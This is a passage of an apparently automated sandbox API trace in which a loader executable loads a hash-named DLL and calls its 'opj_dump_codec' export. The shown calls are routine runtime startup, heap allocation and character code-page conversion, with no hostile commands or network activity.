!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100) returned 0x582390 [0182.609] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x170) returned 0x579aa0 [0182.609] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0182.609] GetLastError () returned 0x0 [0182.609] SetLastError (dwErrCode=0x0) [0182.609] GetEnvironmentStringsW () returned 0x584680* [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9cc) returned 0x585060 [0182.609] FreeEnvironmentStringsW (penv=0x584680) returned 1 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x118) returned 0x57aa10 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x580a90 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x5c) returned 0x570780 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x574c00 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x78) returned 0x57c6f0 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x575a40 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x57b530 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x580770 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x57b590 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x5800e0 [0182.609] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x574970 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x57c770 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x574c70 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x57b800 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd2) returned 0x575cd0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x7c) returned 0x574000 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x580860 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x573c20 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b7a0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x5749e0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x575ab0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x580040 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x578f60 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x580720 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd6) returned 0x575610 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5720d0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b860 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x572110 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x579140 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x579380 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b770 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x42) returned 0x5807c0 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x572150 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x44) returned 0x580810 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b830 [0182.610] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x585060 | out: hHeap=0x570000) returned 1 [0182.610] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1000) returned 0x584680 [0182.610] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0182.611] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0182.611] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" [0182.611] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x579770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0182.611] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0182.617] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.617] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0182.618] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.618] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0182.618] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0182.619] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.619] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0182.619] GetProcessHeap () returned 0x570000 [0182.619] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.620] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0182.620] GetLastError () returned 0x0 [0182.620] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0182.620] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0182.620] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c8) returned 0x585b10 [0182.620] SetLastError (dwErrCode=0x0) [0182.620] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1200) returned 0x585ee0 [0182.622] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0182.622] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0182.622] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0182.622] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0182.623] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" [0182.623] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" [0182.623] GetACP () returned 0x4e4 [0182.623] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x228) returned 0x57aca0 [0182.623] IsValidCodePage (CodePage=0x4e4) returned 1 [0182.623] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0182.623] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0182.623] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.623] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0182.623] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0182.624] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.624] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0182.624] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.624] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0182.624] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.624] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0182.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0182.624] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.624] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0182.624] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.624] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0182.624] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0182.624] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0182.625] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1000) returned 0x5870f0 [0182.625] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0182.625] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0182.625] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0182.626] AreFileApisANSI () returned 1 [0182.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0182.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, 